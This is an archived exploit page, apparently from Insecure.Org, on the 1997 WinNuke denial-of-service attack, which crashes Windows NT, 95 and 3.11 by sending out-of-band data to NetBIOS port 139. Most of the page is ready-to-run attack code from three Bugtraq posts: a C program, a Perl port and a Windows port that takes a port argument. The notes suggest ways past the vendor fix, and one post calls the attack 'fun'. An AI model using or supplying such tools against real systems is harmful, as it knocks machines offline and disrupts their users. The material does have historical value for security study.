Windows NT/95/3.11 Out Of Band (OOB) data barf

Summary
Description:Windows NT will completely crash if you send Out of Band (MSG_OOB) data to its port 139. Win95 will blue screen and network connectivity is usually lost, applications may crash. Win 3.11 with the M$ TCP/IP stack crashes too. Other ports like MS DNS may also be affected.
Author:myst <myst@LIGHT-HOUSE.NET>
Compromise:Stupid DOS attack, but it can be humorous.
Vulnerable Systems:WinNT 4.0, 3.51, Win95 , WFWG 3.11
Date:9 May 1997
Notes:I'm also appending the perl exploit code and the visual basic code. The M$ FIX in service pack 3 and the Hotfix does NOT work! You just have to change the code a bit, or use the Macintosh exploit. Change the TCP Urgent pointer if you want to exploit the post-servicepacke 3 conditon from a UNIX box.
Details


Date: Fri, 9 May 1997 22:11:55 -0400
From: myst <myst@LIGHT-HOUSE.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Windows 95/NT DoS

Hello,

        It is possible to remotely cause denial of service to any windows
95/NT user.  It is done by sending OOB [Out Of Band] data to an
established connection you have with a windows user.  NetBIOS [139] seems
to be the most effective since this is a part of windows.  Apparently
windows doesn't know how to handle OOB, so it panics and crazy things
happen.  I have heard reports of everything from windows dropping carrier
to the entire screen turning white.  Windows also sometimes has trouble
handling anything on a network at all after an attack like this.  A
reboot fixes whatever damage this causes.  Code follows.


_eci



--- CUT HERE ---

/* winnuke.c - (05/07/97)  By _eci  */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */


#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#define dport 139  /* Attack port: 139 is what we want */

int x, s;
char *str = "Bye";  /* Makes no diff */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;


int open_sock(int sock, char *server, int port) {
     struct sockaddr_in blah;
     struct hostent *he;
     bzero((char *)&blah,sizeof(blah));
     blah.sin_family=AF_INET;
     blah.sin_addr.s_addr=inet_addr(server);
     blah.sin_port=htons(port);


    if ((he = gethostbyname(server)) != NULL) {
        bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
    }
    else {
         if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
           perror("gethostbyname()");
           return(-3);
         }
    }

        if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
             perror("connect()");
             close(sock);
             return(-4);
        }
        printf("Connected to [%s:%d].\n",server,port);
        return;
}


void main(int argc, char *argv[]) {

     if (argc != 2) {
       printf("Usage: %s <target>\n",argv[0]);
       exit(0);
     }

     if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket()");
        exit(-1);
     }

     open_sock(s,argv[1],dport);


     printf("Sending crash... ");
       send(s,str,strlen(str),MSG_OOB);
       usleep(100000);
     printf("Done!\n");
     close(s);
}
Date: Sun, 11 May 1997 16:49:16 -0700
From: Ghent <ghent@BOUNTY-HUNTERS.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: more DoS fun

Here is a perl version if anyone wants to play with it.

------
#!/usr/bin/perl

# Ghent - ghent@bounty-hunters.com - Perl version of winnuke.c by _eci

use strict; use Socket;

my($h,$p,$in_addr,$proto,$addr);

$h = "$ARGV[0]"; $p = 139 if (!$ARGV[1]);
if (!$h) { print "A hostname must be provided. Ex: www.microsoft.com\n"; }

$in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;

connect(S,$addr) or die $!; select S; $| = 1; select STDOUT;

print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S;
------

- Ghent
Date: Sun, 11 May 1997 15:03:36 +0400
From: Eugene Surovegin <ebs@GLASNET.RU>
To: BUGTRAQ@NETSPACE.ORG
Subject: Windows port of OOB attack code

Hello,

Here is a Windows port of original winnuke.c by _eci. I compiled it with MS
Visual C++ 4.2b.
I added one additional parameter - <port>.
Now you can call
        >winnuke.exe www.microsoft.com 135

It looks like only port 139 is vulnerable (but who knows...)

--- CUT HERE ---

/* winnuke.c - (05/07/97)  By _eci  */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */

// Windows NT port by Eugene Surovegin <ebs@glasnet.ru>
// Compiled with MS Visual C++ 4.2b, tested on NT 4.0 SP2

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <winsock.h>

#define dport 139  /* Attack port: 139 is what we want */

int open_sock(int sock, char *server, int port) {

  struct sockaddr_in blah;
  struct hostent *he;
  int res;

  memset((char *)&blah,0,sizeof(blah));
  blah.sin_family=AF_INET;
  blah.sin_addr.s_addr=inet_addr(server);
  blah.sin_port=htons(port);

  if ((he = gethostbyname(server)) != NULL)
    memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length);
  else
    if ((blah.sin_addr.s_addr = inet_addr(server))==INADDR_NONE) {
      puts("Cannot resolve host");
      return(-3);
    }

  if (res=connect(sock,(struct sockaddr *)&blah,16)==-1) {
    puts("Cannot connect socket");
    return(-4);
  }
  printf("Connected to [%s:%d].\n",server,port);
  return 0;
}


void main(int argc, char *argv[]) {

  int   s;
  char  *str = "Bye";  /* Makes no diff */
  int   port=0;

  if ( (argc<2) || (argc>3)) {
    printf("Usage: %s <target> [<port>]>\n",argv[0]);
    exit(0);
  }

  if (argc==3) port=atoi(argv[2]);
  if (!port) port=dport;

  WSADATA wsaData;
  if (!WSAStartup(MAKEWORD(1, 1), &wsaData)){
    if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP))!=INVALID_SOCKET) {
      if (!open_sock(s,argv[1],port)){
        puts("Sending crash... ");
        send(s,str,strlen(str),MSG_OOB);
        puts("Done!");
      }
      else printf("Error connecting to host %s",argv[1]);
      closesocket(s);
    }
    else puts("Error getting socket");
    WSACleanup();
  }
  else puts("Cannot init Winsock");
}

--- CUT HERE ---

                                Eugene Surovegin <ebs@glasnet.ru>

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault